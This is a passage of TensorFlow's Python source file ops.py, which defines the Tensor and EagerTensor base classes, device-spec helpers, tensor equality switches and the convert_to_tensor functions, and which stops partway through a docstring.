] | 1 | 2020-08-07T22:18:01.000Z | 2020-08-07T22:18:01.000Z | tensorflow/python/framework/ops.py | davidkirwan/tensorflow | 185a465225a520a1855145efda58b17b1a83d3a5 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/framework/ops.py | davidkirwan/tensorflow | 185a465225a520a1855145efda58b17b1a83d3a5 | [
"Apache-2.0"
] | null | null | null | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classes and functions used to construct graphs."""
# pylint: disable=g-bad-name
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import re
import sys
import threading
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import function_pb2
from tensorflow.core.framework import graph_pb2
from tensorflow.core.framework import node_def_pb2
from tensorflow.core.framework import op_def_pb2
from tensorflow.core.framework import versions_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow as c_api
from tensorflow.python import tf2
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import monitoring
from tensorflow.python.eager import tape
from tensorflow.python.framework import c_api_util
from tensorflow.python.framework import composite_tensor
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import op_def_registry
from tensorflow.python.framework import registry
from tensorflow.python.framework import tensor_conversion_registry
from tensorflow.python.framework import tensor_like
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import traceable_stack
from tensorflow.python.framework import versions
from tensorflow.python.ops import control_flow_util
from tensorflow.python.platform import app
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import compat
from tensorflow.python.util import decorator_utils
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import lock_util
from tensorflow.python.util import memory
from tensorflow.python.util import object_identity
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_stack
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.deprecation import deprecated_args
from tensorflow.python.util.lazy_loader import LazyLoader
from tensorflow.python.util.tf_export import tf_export
ag_ctx = LazyLoader(
"ag_ctx", globals(),
"tensorflow.python.autograph.core.ag_ctx")
# Temporary global switches determining if we should enable the work-in-progress
# calls to the C API. These will be removed once all functionality is supported.
_USE_C_API = True
_USE_C_SHAPES = True
_api_usage_gauge = monitoring.BoolGauge(
"/tensorflow/api/ops_eager_execution",
"Whether ops.enable_eager_execution() is called.")
# pylint: disable=protected-access
_TensorLike = tensor_like._TensorLike
_DTYPES_INTERN_TABLE = dtypes._INTERN_TABLE
# pylint: enable=protected-access
def tensor_id(tensor):
"""Returns a unique identifier for this Tensor."""
return tensor._id # pylint: disable=protected-access
class _UserDeviceSpec(object):
"""Store user-specified device and provide computation of merged device."""
def __init__(self, device_name_or_function):
self._device_name_or_function = device_name_or_function
self.display_name = str(self._device_name_or_function)
self.function = device_name_or_function
self.raw_string = None
if isinstance(device_name_or_function, pydev.MergeDevice):
self.is_null_merge = device_name_or_function.is_null_merge
elif callable(device_name_or_function):
self.is_null_merge = False
dev_func = self._device_name_or_function
func_name = function_utils.get_func_name(dev_func)
func_code = function_utils.get_func_code(dev_func)
if func_code:
fname = func_code.co_filename
lineno = func_code.co_firstlineno
else:
fname = "unknown"
lineno = -1
self.display_name = "%s<%s, %d>" % (func_name, fname, lineno)
elif device_name_or_function is None:
# NOTE(taylorrobie): This MUST be False. None signals a break in the
# device stack, so `is_null_merge` must be False for such a case to
# allow callers to safely skip over null merges without missing a None.
self.is_null_merge = False
else:
self.raw_string = device_name_or_function
self.function = pydev.merge_device(device_name_or_function)
self.is_null_merge = self.function.is_null_merge
# We perform this check in __init__ because it is of non-trivial cost,
# and self.string_merge is typically called many times.
self.fast_string_merge = isinstance(self.function, pydev.MergeDevice)
def string_merge(self, node_def):
if self.fast_string_merge:
return self.function.shortcut_string_merge(node_def)
return compat.as_str(_device_string(self.function(node_def)))
class NullContextmanager(object):
def __init__(self, *args, **kwargs):
pass
def __enter__(self):
pass
def __exit__(self, type_arg, value_arg, traceback_arg):
return False # False values do not suppress exceptions
def _override_helper(clazz_object, operator, func):
"""Overrides (string) operator on Tensors to call func.
Args:
clazz_object: the class to override for; either Tensor or SparseTensor.
operator: the string name of the operator to override.
func: the function that replaces the overridden operator.
Raises:
ValueError: If operator has already been overwritten,
or if operator is not allowed to be overwritten.
"""
existing = getattr(clazz_object, operator, None)
if existing is not None:
# Check to see if this is a default method-wrapper or slot wrapper which
# will be true for the comparison operators.
if not isinstance(existing, type(object.__lt__)):
raise ValueError("operator %s cannot be overwritten again on class %s." %
(operator, clazz_object))
if operator not in Tensor.OVERLOADABLE_OPERATORS:
raise ValueError("Overriding %s is disallowed" % operator)
setattr(clazz_object, operator, func)
def _as_graph_element(obj):
"""Convert `obj` to a graph element if possible, otherwise return `None`.
Args:
obj: Object to convert.
Returns:
The result of `obj._as_graph_element()` if that method is available;
otherwise `None`.
"""
conv_fn = getattr(obj, "_as_graph_element", None)
if conv_fn and callable(conv_fn):
return conv_fn()
return None
_TENSOR_LIKE_TYPES = tuple()
def is_dense_tensor_like(t):
"""EXPERIMENTAL: Returns true if `t` implements the tensor interface.
See `register_dense_tensor_like_type()` for the current definition of a
"tensor-like type".
Args:
t: An object.
Returns:
True iff `t` is an instance of one of the registered "tensor-like" types.
"""
return isinstance(t, _TENSOR_LIKE_TYPES)
def register_dense_tensor_like_type(tensor_type):
"""EXPERIMENTAL: Registers `tensor_type` as implementing the tensor interface.
A "tensor-like type" can represent a single dense tensor, and implements
the `name` and `dtype` properties.
Args:
tensor_type: A type implementing the tensor interface.
Raises:
TypeError: If `tensor_type` does not implement the tensor interface.
"""
try:
if not isinstance(tensor_type.name, property):
raise TypeError("Type %s does not define a `name` property" %
tensor_type.__name__)
except AttributeError:
raise TypeError("Type %s does not define a `name` property" %
tensor_type.__name__)
try:
if not isinstance(tensor_type.dtype, property):
raise TypeError("Type %s does not define a `dtype` property" %
tensor_type.__name__)
except AttributeError:
raise TypeError("Type %s does not define a `dtype` property" %
tensor_type.__name__)
# We expect this list to be small, so choose quadratic complexity
# for registration, so that we have a tuple that can be used for
# more efficient `isinstance` checks later.
global _TENSOR_LIKE_TYPES
_TENSOR_LIKE_TYPES = tuple(list(_TENSOR_LIKE_TYPES) + [tensor_type])
def uid():
"""A unique (within this program execution) integer."""
return c_api.TFE_Py_UID()
def numpy_text(tensor, is_repr=False):
"""Human readable representation of a tensor's numpy value."""
if tensor.dtype.is_numpy_compatible:
# pylint: disable=protected-access
text = repr(tensor._numpy()) if is_repr else str(tensor._numpy())
# pylint: enable=protected-access
else:
text = "<unprintable>"
if "\n" in text:
text = "\n" + text
return text
@tf_export(v1=["enable_tensor_equality"])
def enable_tensor_equality():
"""Compare Tensors with element-wise comparison and thus be unhashable.
Comparing tensors with element-wise allows comparisons such as
tf.Variable(1.0) == 1.0. Element-wise equality implies that tensors are
unhashable. Thus tensors can no longer be directly used in sets or as a key in
a dictionary.
"""
Tensor._USE_EQUALITY = True # pylint: disable=protected-access
@tf_export(v1=["disable_tensor_equality"])
def disable_tensor_equality():
"""Compare Tensors by their id and be hashable.
This is a legacy behaviour of TensorFlow and is highly discouraged.
"""
Tensor._USE_EQUALITY = False # pylint: disable=protected-access
@tf_export("Tensor")
class Tensor(_TensorLike):
"""Represents one of the outputs of an `Operation`.
A `Tensor` is a symbolic handle to one of the outputs of an
`Operation`. It does not hold the values of that operation's output,
but instead provides a means of computing those values in a
TensorFlow `tf.compat.v1.Session`.
This class has two primary purposes:
1. A `Tensor` can be passed as an input to another `Operation`.
This builds a dataflow connection between operations, which
enables TensorFlow to execute an entire `Graph` that represents a
large, multi-step computation.
2. After the graph has been launched in a session, the value of the
`Tensor` can be computed by passing it to
`tf.Session.run`.
`t.eval()` is a shortcut for calling
`tf.compat.v1.get_default_session().run(t)`.
In the following example, `c`, `d`, and `e` are symbolic `Tensor`
objects, whereas `result` is a numpy array that stores a concrete
value:
```python
# Build a dataflow graph.
c = tf.constant([[1.0, 2.0], [3.0, 4.0]])
d = tf.constant([[1.0, 1.0], [0.0, 1.0]])
e = tf.matmul(c, d)
# Construct a `Session` to execute the graph.
sess = tf.compat.v1.Session()
# Execute the graph and store the value that `e` represents in `result`.
result = sess.run(e)
```
"""
# List of Python operators that we allow to override.
OVERLOADABLE_OPERATORS = {
# Binary.
"__add__",
"__radd__",
"__sub__",
"__rsub__",
"__mul__",
"__rmul__",
"__div__",
"__rdiv__",
"__truediv__",
"__rtruediv__",
"__floordiv__",
"__rfloordiv__",
"__mod__",
"__rmod__",
"__lt__",
"__le__",
"__gt__",
"__ge__",
"__ne__",
"__eq__",
"__and__",
"__rand__",
"__or__",
"__ror__",
"__xor__",
"__rxor__",
"__getitem__",
"__pow__",
"__rpow__",
# Unary.
"__invert__",
"__neg__",
"__abs__",
"__matmul__",
"__rmatmul__"
}
# Whether to allow hashing or numpy-style equality
_USE_EQUALITY = tf2.enabled()
def __init__(self, op, value_index, dtype):
"""Creates a new `Tensor`.
Args:
op: An `Operation`. `Operation` that computes this tensor.
value_index: An `int`. Index of the operation's endpoint that produces
this tensor.
dtype: A `DType`. Type of elements stored in this tensor.
Raises:
TypeError: If the op is not an `Operation`.
"""
if not isinstance(op, Operation):
raise TypeError("op needs to be an Operation: %s" % op)
self._op = op
self._value_index = value_index
self._dtype = dtypes.as_dtype(dtype)
# This will be set by self._as_tf_output().
self._tf_output = None
# This will be set by self.shape().
self._shape_val = None
# List of operations that use this Tensor as input. We maintain this list
# to easily navigate a computation graph.
self._consumers = []
self._id = uid()
self._name = None
@staticmethod
def _create_with_tf_output(op, value_index, dtype, tf_output):
ret = Tensor(op, value_index, dtype)
ret._tf_output = tf_output
return ret
@property
def op(self):
"""The `Operation` that produces this tensor as an output."""
return self._op
@property
def dtype(self):
"""The `DType` of elements in this tensor."""
return self._dtype
@property
def graph(self):
"""The `Graph` that contains this tensor."""
return self._op.graph
@property
def name(self):
"""The string name of this tensor."""
if self._name is None:
if not self._op.name:
raise ValueError("Operation was not named: %s" % self._op)
self._name = "%s:%d" % (self._op.name, self._value_index)
return self._name
@property
def device(self):
"""The name of the device on which this tensor will be produced, or None."""
return self._op.device
@property
def shape(self):
"""Returns the `TensorShape` that represents the shape of this tensor.
The shape is computed using shape inference functions that are
registered in the Op for each `Operation`. See
`tf.TensorShape`
for more details of what a shape represents.
The inferred shape of a tensor is used to provide shape
information without having to launch the graph in a session. This
can be used for debugging, and providing early error messages. For
example:
```python
c = tf.constant([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
print(c.shape)
==> TensorShape([Dimension(2), Dimension(3)])
d = tf.constant([[1.0, 0.0], [0.0, 1.0], [1.0, 0.0], [0.0, 1.0]])
print(d.shape)
==> TensorShape([Dimension(4), Dimension(2)])
# Raises a ValueError, because `c` and `d` do not have compatible
# inner dimensions.
e = tf.matmul(c, d)
f = tf.matmul(c, d, transpose_a=True, transpose_b=True)
print(f.shape)
==> TensorShape([Dimension(3), Dimension(4)])
```
In some cases, the inferred shape may have unknown dimensions. If
the caller has additional information about the values of these
dimensions, `Tensor.set_shape()` can be used to augment the
inferred shape.
Returns:
A `TensorShape` representing the shape of this tensor.
"""
if self._shape_val is None:
self._shape_val = self._c_api_shape()
return self._shape_val
def _get_input_ops_without_shapes(self, target_op):
"""Returns ops needing shape inference to compute target_op's shape."""
result = []
stack = [self._op]
visited = set()
while stack:
op = stack.pop()
if op in visited:
continue
result.append(op)
stack.extend(t.op for t in op.inputs if t._shape_val is None)
visited.add(op)
return result
def _c_api_shape(self):
"""Returns the TensorShape of this tensor according to the C API."""
c_graph = self._op._graph._c_graph # pylint: disable=protected-access
shape_vector, unknown_shape = c_api.TF_GraphGetTensorShapeHelper(
c_graph, self._as_tf_output())
if unknown_shape:
return tensor_shape.unknown_shape()
else:
shape_vector = [None if d == -1 else d for d in shape_vector]
return tensor_shape.TensorShape(shape_vector)
@property
def _shape(self):
logging.warning("Tensor._shape is private, use Tensor.shape "
"instead. Tensor._shape will eventually be removed.")
return self.shape
@_shape.setter
def _shape(self, value):
raise ValueError(
"Tensor._shape cannot be assigned, use Tensor.set_shape instead.")
def _disallow_when_autograph_disabled(self, task):
raise errors.OperatorNotAllowedInGraphError(
"{} is not allowed: AutoGraph is disabled in this function."
" Try decorating it directly with @tf.function.".format(task))
def _disallow_when_autograph_enabled(self, task):
raise errors.OperatorNotAllowedInGraphError(
"{} is not allowed: AutoGraph did not convert this function. Try"
" decorating it directly with @tf.function.".format(task))
def _disallow_in_graph_mode(self, task):
raise errors.OperatorNotAllowedInGraphError(
"{} is not allowed in Graph execution. Use Eager execution or decorate"
" this function with @tf.function.".format(task))
def _disallow_bool_casting(self):
if ag_ctx.control_status_ctx().status == ag_ctx.Status.DISABLED:
self._disallow_when_autograph_disabled(
"using a `tf.Tensor` as a Python `bool`")
elif ag_ctx.control_status_ctx().status == ag_ctx.Status.ENABLED:
self._disallow_when_autograph_enabled(
"using a `tf.Tensor` as a Python `bool`")
else:
# Default: V1-style Graph execution.
self._disallow_in_graph_mode("using a `tf.Tensor` as a Python `bool`")
def _disallow_iteration(self):
if ag_ctx.control_status_ctx().status == ag_ctx.Status.DISABLED:
self._disallow_when_autograph_disabled("iterating over `tf.Tensor`")
elif ag_ctx.control_status_ctx().status == ag_ctx.Status.ENABLED:
self._disallow_when_autograph_enabled("iterating over `tf.Tensor`")
else:
# Default: V1-style Graph execution.
self._disallow_in_graph_mode("iterating over `tf.Tensor`")
def __iter__(self):
if not context.executing_eagerly():
self._disallow_iteration()
shape = self._shape_tuple()
if shape is None:
raise TypeError("Cannot iterate over a tensor with unknown shape.")
if not shape:
raise TypeError("Cannot iterate over a scalar tensor.")
if shape[0] is None:
raise TypeError(
"Cannot iterate over a tensor with unknown first dimension.")
for i in xrange(shape[0]):
yield self[i]
def _shape_as_list(self):
if self.shape.ndims is not None:
return [dim.value for dim in self.shape.dims]
else:
return None
def _shape_tuple(self):
shape = self._shape_as_list()
if shape is None:
return None
return tuple(shape)
def _rank(self):
"""Integer rank of this Tensor, if known, else None.
Returns:
Integer rank or None
"""
return self.shape.ndims
def get_shape(self):
"""Alias of Tensor.shape."""
return self.shape
def set_shape(self, shape):
"""Updates the shape of this tensor.
This method can be called multiple times, and will merge the given
`shape` with the current shape of this tensor. It can be used to
provide additional information about the shape of this tensor that
cannot be inferred from the graph alone. For example, this can be used
to provide additional information about the shapes of images:
```python
_, image_data = tf.compat.v1.TFRecordReader(...).read(...)
image = tf.image.decode_png(image_data, channels=3)
# The height and width dimensions of `image` are data dependent, and
# cannot be computed without executing the op.
print(image.shape)
==> TensorShape([Dimension(None), Dimension(None), Dimension(3)])
# We know that each image in this dataset is 28 x 28 pixels.
image.set_shape([28, 28, 3])
print(image.shape)
==> TensorShape([Dimension(28), Dimension(28), Dimension(3)])
```
NOTE: This shape is not enforced at runtime. Setting incorrect shapes can
result in inconsistencies between the statically-known graph and the runtime
value of tensors. For runtime validation of the shape, use `tf.ensure_shape`
instead.
Args:
shape: A `TensorShape` representing the shape of this tensor, a
`TensorShapeProto`, a list, a tuple, or None.
Raises:
ValueError: If `shape` is not compatible with the current shape of
this tensor.
"""
# Reset cached shape.
self._shape_val = None
# We want set_shape to be reflected in the C API graph for when we run it.
if not isinstance(shape, tensor_shape.TensorShape):
shape = tensor_shape.TensorShape(shape)
dim_list = []
if shape.dims is None:
unknown_shape = True
else:
unknown_shape = False
for dim in shape.dims:
if dim.value is None:
dim_list.append(-1)
else:
dim_list.append(dim.value)
try:
c_api.TF_GraphSetTensorShape_wrapper(
self._op._graph._c_graph, # pylint: disable=protected-access
self._as_tf_output(),
dim_list,
unknown_shape)
except errors.InvalidArgumentError as e:
# Convert to ValueError for backwards compatibility.
raise ValueError(str(e))
@property
def value_index(self):
"""The index of this tensor in the outputs of its `Operation`."""
return self._value_index
def consumers(self):
"""Returns a list of `Operation`s that consume this tensor.
Returns:
A list of `Operation`s.
"""
consumer_names = c_api.TF_OperationOutputConsumers_wrapper(
self._as_tf_output())
# pylint: disable=protected-access
return [
self.graph._get_operation_by_name_unsafe(name)
for name in consumer_names
]
# pylint: enable=protected-access
def _as_node_def_input(self):
"""Return a value to use for the NodeDef "input" attribute.
The returned string can be used in a NodeDef "input" attribute
to indicate that the NodeDef uses this Tensor as input.
Raises:
ValueError: if this Tensor's Operation does not have a name.
Returns:
a string.
"""
if not self._op.name:
raise ValueError("Operation was not named: %s" % self._op)
if self._value_index == 0:
return self._op.name
else:
return "%s:%d" % (self._op.name, self._value_index)
def _as_tf_output(self):
# pylint: disable=protected-access
# NOTE: Beyond preventing unnecessary (re-)allocation, the cached object
# also guarantees that a dictionary of tf_output objects will retain a
# deterministic (yet unsorted) order which prevents memory blowup in the
# cache of executor(s) stored for every session.
if self._tf_output is None:
self._tf_output = c_api_util.tf_output(self.op._c_op, self.value_index)
return self._tf_output
# pylint: enable=protected-access
def __str__(self):
return "Tensor(\"%s\"%s%s%s)" % (
self.name,
(", shape=%s" %
self.get_shape()) if self.get_shape().ndims is not None else "",
(", dtype=%s" % self._dtype.name) if self._dtype else "",
(", device=%s" % self.device) if self.device else "")
def __repr__(self):
return "<tf.Tensor '%s' shape=%s dtype=%s>" % (self.name, self.get_shape(),
self._dtype.name)
def __hash__(self):
g = getattr(self, "graph", None)
if (Tensor._USE_EQUALITY and executing_eagerly_outside_functions() and
(g is None or g._building_function)): # pylint: disable=protected-access
raise TypeError("Tensor is unhashable if Tensor equality is enabled. "
"Instead, use tensor.experimental_ref() as the key.")
else:
return id(self)
def __copy__(self):
# TODO(b/77597810): get rid of Tensor copies.
cls = self.__class__
result = cls.__new__(cls)
result.__dict__.update(self.__dict__)
return result
# NOTE(mrry): This enables the Tensor's overloaded "right" binary
# operators to run when the left operand is an ndarray, because it
# accords the Tensor class higher priority than an ndarray, or a
# numpy matrix.
# TODO(mrry): Convert this to using numpy's __numpy_ufunc__
# mechanism, which allows more control over how Tensors interact
# with ndarrays.
__array_priority__ = 100
def __array__(self):
raise NotImplementedError("Cannot convert a symbolic Tensor ({}) to a numpy"
" array.".format(self.name))
def __len__(self):
raise TypeError("len is not well defined for symbolic Tensors. ({}) "
"Please call `x.shape` rather than `len(x)` for "
"shape information.".format(self.name))
@staticmethod
def _override_operator(operator, func):
_override_helper(Tensor, operator, func)
def __bool__(self):
"""Dummy method to prevent a tensor from being used as a Python `bool`.
This overload raises a `TypeError` when the user inadvertently
treats a `Tensor` as a boolean (most commonly in an `if` or `while`
statement), in code that was not converted by AutoGraph. For example:
```python
if tf.constant(True): # Will raise.
# ...
if tf.constant(5) < tf.constant(7): # Will raise.
# ...
```
Raises:
`TypeError`.
"""
self._disallow_bool_casting()
def __nonzero__(self):
"""Dummy method to prevent a tensor from being used as a Python `bool`.
This is the Python 2.x counterpart to `__bool__()` above.
Raises:
`TypeError`.
"""
self._disallow_bool_casting()
def eval(self, feed_dict=None, session=None):
"""Evaluates this tensor in a `Session`.
Calling this method will execute all preceding operations that
produce the inputs needed for the operation that produces this
tensor.
*N.B.* Before invoking `Tensor.eval()`, its graph must have been
launched in a session, and either a default session must be
available, or `session` must be specified explicitly.
Args:
feed_dict: A dictionary that maps `Tensor` objects to feed values. See
`tf.Session.run` for a description of the valid feed values.
session: (Optional.) The `Session` to be used to evaluate this tensor. If
none, the default session will be used.
Returns:
A numpy array corresponding to the value of this tensor.
"""
return _eval_using_default_session(self, feed_dict, self.graph, session)
def experimental_ref(self):
# tf.Variable also has the same experimental_ref() API. If you update the
# documenation here, please update tf.Variable.experimental_ref() as well.
"""Returns a hashable reference object to this Tensor.
Warning: Experimental API that could be changed or removed.
The primary usecase for this API is to put tensors in a set/dictionary.
We can't put tensors in a set/dictionary as `tensor.__hash__()` is no longer
available starting Tensorflow 2.0.
```python
import tensorflow as tf
x = tf.constant(5)
y = tf.constant(10)
z = tf.constant(10)
# The followings will raise an exception starting 2.0
# TypeError: Tensor is unhashable if Tensor equality is enabled.
tensor_set = {x, y, z}
tensor_dict = {x: 'five', y: 'ten', z: 'ten'}
```
Instead, we can use `tensor.experimental_ref()`.
```python
tensor_set = {x.experimental_ref(),
y.experimental_ref(),
z.experimental_ref()}
print(x.experimental_ref() in tensor_set)
==> True
tensor_dict = {x.experimental_ref(): 'five',
y.experimental_ref(): 'ten',
z.experimental_ref(): 'ten'}
print(tensor_dict[y.experimental_ref()])
==> ten
```
Also, the reference object provides `.deref()` function that returns the
original Tensor.
```python
x = tf.constant(5)
print(x.experimental_ref().deref())
==> tf.Tensor(5, shape=(), dtype=int32)
```
"""
return object_identity.Reference(self)
# TODO(agarwal): consider getting rid of this.
class _EagerTensorBase(Tensor):
"""Base class for EagerTensor."""
# __int__, __float__ and __index__ may copy the tensor to CPU and
# only work for scalars; values are cast as per numpy.
def __int__(self):
return int(self._numpy())
def __long__(self):
return long(self._numpy())
def __float__(self):
return float(self._numpy())
def __index__(self):
maybe_arr = self._numpy()
if isinstance(maybe_arr, np.ndarray):
return maybe_arr.__index__()
return int(maybe_arr) # Must be a NumPy scalar.
def __bool__(self):
return bool(self._numpy())
__nonzero__ = __bool__
def __format__(self, format_spec):
return self._numpy().__format__(format_spec)
def __reduce__(self):
return convert_to_tensor, (self._numpy(),)
def __copy__(self):
# Eager Tensors are immutable so it's safe to return themselves as a copy.
return self
def __deepcopy__(self, memo):
# Eager Tensors are immutable so it's safe to return themselves as a copy.
del memo
return self
def __str__(self):
return "tf.Tensor(%s, shape=%s, dtype=%s)" % (numpy_text(self), self.shape,
self.dtype.name)
def __repr__(self):
return "<tf.Tensor: id=%s, shape=%s, dtype=%s, numpy=%s>" % (
self._id, self.shape, self.dtype.name, numpy_text(self, is_repr=True))
def __len__(self):
"""Returns the length of the first dimension in the Tensor."""
if not self.shape.ndims:
raise TypeError("Scalar tensor has no `len()`")
return self._shape_tuple()[0]
def _numpy(self):
raise NotImplementedError()
@property
def dtype(self):
# Note: using the intern table directly here as this is
# performance-sensitive in some models.
return dtypes._INTERN_TABLE[self._datatype_enum()] # pylint: disable=protected-access
def numpy(self):
"""Returns a numpy array or a scalar with the same contents as the Tensor.
TODO(ashankar,agarwal): Perhaps this should NOT reference the underlying
buffer but instead always explicitly copy? Note that currently it may or may
not copy based on whether the numpy data is properly aligned or not.
Returns:
A numpy array or a scalar. Numpy array may share memory with the
Tensor object. Any changes to one may be reflected in the other. A scalar
value is returned when self has rank 0.
Raises:
ValueError: if the type of this Tensor is not representable in numpy.
"""
maybe_arr = self._numpy() # pylint: disable=protected-access
return maybe_arr.copy() if isinstance(maybe_arr, np.ndarray) else maybe_arr
@property
def backing_device(self):
"""Returns the name of the device holding this tensor's memory.
`.backing_device` is usually the same as `.device`, which returns
the device on which the kernel of the operation that produced this tensor
ran. However, some operations can produce tensors on a different device
(e.g., an operation that executes on the GPU but produces output tensors
in host memory).
"""
raise NotImplementedError()
def _datatype_enum(self):
raise NotImplementedError()
def _shape_tuple(self):
"""The shape of this Tensor, as a tuple.
This is more performant than tuple(shape().as_list()) as it avoids
two list and one object creation. Marked private for now as from an API
perspective, it would be better to have a single performant way of
getting a shape rather than exposing shape() and shape_tuple()
(and heaven forbid, shape_list() etc. as well!). Punting on that for now,
but ideally one would work things out and remove the need for this method.
Returns:
tuple with the shape.
"""
raise NotImplementedError()
def _rank(self):
"""Integer rank of this Tensor.
Unlike regular Tensors, the rank is always known for EagerTensors.
This is more performant than len(self._shape_tuple())
Returns:
Integer rank
"""
raise NotImplementedError()
def _num_elements(self):
"""Number of elements of this Tensor.
Unlike regular Tensors, the number of elements is always known for
EagerTensors.
This is more performant than tensor.shape.num_elements
Returns:
Long - num elements in the tensor
"""
raise NotImplementedError()
def _copy_to_device(self, device_name): # pylint: disable=redefined-outer-name
raise NotImplementedError()
@staticmethod
def _override_operator(name, func):
setattr(_EagerTensorBase, name, func)
def _copy_nograd(self, ctx=None, device_name=None):
"""Copies tensor to dest device, but doesn't record the operation."""
# Creates a new tensor on the dest device.
if ctx is None:
ctx = context.context()
if device_name is None:
device_name = ctx.device_name
# pylint: disable=protected-access
try:
ctx.ensure_initialized()
new_tensor = self._copy_to_device(device_name)
except core._NotOkStatusException as e:
six.raise_from(core._status_to_exception(e.code, e.message), None)
return new_tensor
def _copy(self, ctx=None, device_name=None):
"""Copies tensor to dest device."""
new_tensor = self._copy_nograd(ctx, device_name)
# Record the copy on tape and define backprop copy as well.
if context.executing_eagerly():
self_device = self.device
def grad_fun(dresult):
return [
dresult._copy(device_name=self_device)
if hasattr(dresult, "_copy") else dresult
]
tape.record_operation("_copy", [new_tensor], [self], grad_fun)
return new_tensor
# pylint: enable=protected-access
@property
def shape(self):
if self._tensor_shape is None: # pylint: disable=access-member-before-definition
# `_tensor_shape` is declared and defined in the definition of
# `EagerTensor`, in C.
self._tensor_shape = tensor_shape.TensorShape(self._shape_tuple())
return self._tensor_shape
def get_shape(self):
"""Alias of Tensor.shape."""
return self.shape
def _shape_as_list(self):
"""The shape of the tensor as a list."""
return list(self._shape_tuple())
@property
def ndim(self):
"""Returns the number of Tensor dimensions."""
return self.shape.ndims
@deprecation.deprecated(None, "Use tf.identity instead.")
def cpu(self):
"""A copy of this Tensor with contents backed by host memory."""
return self._copy(context.context(), "CPU:0")
@deprecation.deprecated(None, "Use tf.identity instead.")
def gpu(self, gpu_index=0):
"""A copy of this Tensor with contents backed by memory on the GPU.
Arguments:
gpu_index: Identifies which GPU to place the contents on the returned
Tensor in.
Returns:
A GPU-memory backed Tensor object initialized with the same contents
as this Tensor.
"""
return self._copy(context.context(), "GPU:" + str(gpu_index))
def set_shape(self, shape):
if not self.shape.is_compatible_with(shape):
raise ValueError(
"Tensor's shape %s is not compatible with supplied shape %s" %
(self.shape, shape))
# Methods not supported / implemented for Eager Tensors.
@property
def op(self):
raise AttributeError(
"Tensor.op is meaningless when eager execution is enabled.")
@property
def graph(self):
raise AttributeError(
"Tensor.graph is meaningless when eager execution is enabled.")
@property
def name(self):
raise AttributeError(
"Tensor.name is meaningless when eager execution is enabled.")
@property
def value_index(self):
raise AttributeError(
"Tensor.value_index is meaningless when eager execution is enabled.")
def consumers(self):
raise NotImplementedError(
"Tensor.consumers is meaningless when eager execution is enabled.")
def _add_consumer(self, consumer):
raise NotImplementedError(
"_add_consumer not supported when eager execution is enabled.")
def _as_node_def_input(self):
raise NotImplementedError(
"_as_node_def_input not supported when eager execution is enabled.")
def _as_tf_output(self):
raise NotImplementedError(
"_as_tf_output not supported when eager execution is enabled.")
def eval(self, feed_dict=None, session=None):
raise NotImplementedError(
"eval is not supported when eager execution is enabled, "
"is .numpy() what you're looking for?")
# This call creates an EagerTensor class, as a subclass of _EagerTensorBase, and
# registers it with the current module.
EagerTensor = c_api.TFE_Py_InitEagerTensor(_EagerTensorBase)
register_dense_tensor_like_type(Tensor)
@tf_export(v1=["convert_to_tensor"])
def convert_to_tensor(value,
dtype=None,
name=None,
preferred_dtype=None,
dtype_hint=None):
"""Converts the given `value` to a `Tensor`.
This function converts Python objects of various types to `Tensor`
objects. It accepts `Tensor` objects, numpy arrays, Python lists,
and Python scalars. For example:
```python
import numpy as np
def my_func(arg):
arg = tf.convert_to_tensor(arg, dtype=tf.float32)
return tf.matmul(arg, arg) + arg
# The following calls are equivalent.
value_1 = my_func(tf.constant([[1.0, 2.0], [3.0, 4.0]]))
value_2 = my_func([[1.0, 2.0], [3.0, 4.0]])
value_3 = my_func(np.array([[1.0, 2.0], [3.0, 4.0]], dtype=np.float32))
```
This function can be useful when composing a new operation in Python
(such as `my_func` in the example above). All standard Python op
constructors apply this function to each of their Tensor-valued
inputs, which allows those ops to accept numpy arrays, Python lists,
and scalars in addition to `Tensor` objects.
Note: This function diverges from default Numpy behavior for `float` and
`string` types when `None` is present in a Python list or scalar. Rather
than silently converting `None` values, an error will be thrown.
Args:
value: An object whose type has a registered `Tensor` conversion function.
dtype: Optional element type for the returned tensor. If missing, the type
is inferred from the type of `value`.
name: Optional name to use if a new `Tensor` is created.
preferred_dtype: Optional element type for the returned tensor, used when
dtype is None. In some cases, a caller may not have a dtype in mind when
converting to a tensor, so preferred_dtype can be used as a soft
preference. If the conversion to `preferred_dtype` is not possible, this
argument has no effect.
dtype_hint: same meaning as preferred_dtype, and overrides it.
Returns:
A `Tensor` based on `value`.
Raises:
TypeError: If no conversion function is registered for `value` to `dtype`.
RuntimeError: If a registered conversion function returns an invalid value.
ValueError: If the `value` is a tensor not of given `dtype` in graph mode.
"""
preferred_dtype = deprecation.deprecated_argument_lookup(
"dtype_hint", dtype_hint, "preferred_dtype", preferred_dtype)
return convert_to_tensor_v2(value, dtype, preferred_dtype, name)
@tf_export("convert_to_tensor", v1=[])
def convert_to_tensor_v2(value, dtype=None, dtype_hint=None, name=None):
"""Converts the given `value` to a `Tensor`.
This function converts Python objects of various types to `Tensor`
objects. It accepts `Tensor` objects, numpy arrays, Python lists,
and Python scalars. For example:
```python
import numpy as np
def my_func(arg):
arg = tf.convert_to_tensor(arg, dtype=tf.float32)
return tf.matmul(arg, arg) + arg
# The following calls are equivalent.
value_1 = my_func(tf.constant([[1.0, 2.0], [3.0, 4.0]]))
